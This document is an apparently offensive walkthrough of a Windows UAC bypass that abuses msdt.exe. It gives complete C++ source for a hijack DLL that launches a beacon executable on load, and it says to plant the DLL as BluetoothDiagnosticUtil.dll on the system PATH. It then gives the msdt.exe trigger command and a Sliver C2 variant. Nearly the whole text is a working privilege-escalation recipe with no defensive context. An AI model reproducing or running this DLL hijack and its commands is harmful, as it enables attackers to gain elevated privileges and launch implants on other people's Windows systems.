UAC Bypass msdt.exe
1.0 Prerequisites
1.1 Compile DLL
NOTE
Modify the application path and compile as x86 architecture
#include "pch.h"
#include <iostream>
#include <windows.h>
void executor()
{
STARTUPINFO si = { sizeof(STARTUPINFO) };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL; // Ensures the console window is visible
PROCESS_INFORMATION pi;
if (CreateProcess(
L"C:\\tmp\\beacon1.exe", // Application path
NULL, // Command line args
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Inherit handles
CREATE_NEW_CONSOLE, // Ensures a new console window
NULL, // Use parent's environment
NULL, // Use parent's starting directory
&si, // Pointer to STARTUPINFO
&pi) // Pointer to PROCESS_INFORMATION
)
{
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
else
{
std::cerr << "Failed to start cmd.exe. Error: " << GetLastError() << std::endl;
}
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
executor();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}1.2 Save to directory
Place the DLL as BluetoothDiagnosticUtil.dll in a directory, which is listed in the %PATH% variable.
2.0 Attack
2.1 Run msdt.exe
c:\windows\syswow64\msdt.exe -path C:\WINDOWS\diagnostics\index\BluetoothDiagnostic.xml -skip yes2.2 Sliver mod
execute -o c:\\windows\\syswow64\\msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\BluetoothDiagnostic.xml -skip yes